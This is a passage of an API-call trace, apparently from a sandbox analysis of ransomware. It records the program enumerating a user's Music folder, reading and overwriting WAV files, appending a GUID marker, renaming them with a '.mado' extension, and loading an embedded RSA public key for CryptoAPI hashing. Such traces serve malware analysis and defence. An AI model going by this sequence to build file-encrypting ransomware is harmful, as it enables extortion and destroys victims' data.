(HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe388 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe370 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68190 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b682a8 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3b8 | out: hHeap=0x2c0000) returned 1 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.599] GetCurrentThreadId () returned 0x600 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71ea0 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.599] GetCurrentThreadId () returned 0x600 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3d0 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3e8 [0204.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.601] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x953a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.601] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb80 | out: hHeap=0x2c0000) returned 1 [0204.602] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.602] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.602] CloseHandle (hObject=0x63c) returned 1 [0204.603] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OHeX4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohex4.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\OHeX4.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ohex4.wav.mado")) returned 1 [0204.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.603] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0204.604] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0216a0, ftCreationTime.dwHighDateTime=0x1d5e814, ftLastAccessTime.dwLowDateTime=0xed84df40, ftLastAccessTime.dwHighDateTime=0x1d5d98a, ftLastWriteTime.dwLowDateTime=0xed84df40, ftLastWriteTime.dwHighDateTime=0x1d5d98a, nFileSizeHigh=0x0, nFileSizeLow=0xdffa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q88sc5F3DUn.wav", cAlternateFileName="Q88SC5~1.WAV")) returned 1 [0204.604] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\q88sc5F3DUn.wav") returned=".wav" [0204.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\q88sc5F3DUn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\q88sc5f3dun.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.605] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=57338) returned 1 [0204.605] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.610] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xdfd4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.610] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.611] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xdffa, lpOverlapped=0x0) returned 1 [0204.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.612] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.612] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.613] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.613] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.613] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.613] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.613] GetLastError () returned 0x0 [0204.613] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.613] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0204.613] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.613] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.613] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.614] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3d0 | out: hHeap=0x2c0000) returned 1 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3d0 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe3a0 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe388 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b682a8 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b683c0 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3a0 | out: hHeap=0x2c0000) returned 1 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe388 | out: hHeap=0x2c0000) returned 1 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe3d0 | out: hHeap=0x2c0000) returned 1 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.615] GetCurrentThreadId () returned 0x600 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71f30 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.615] GetCurrentThreadId () returned 0x600 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3d0 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe388 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3a0 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3e8 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe3b8 [0204.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe400 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) 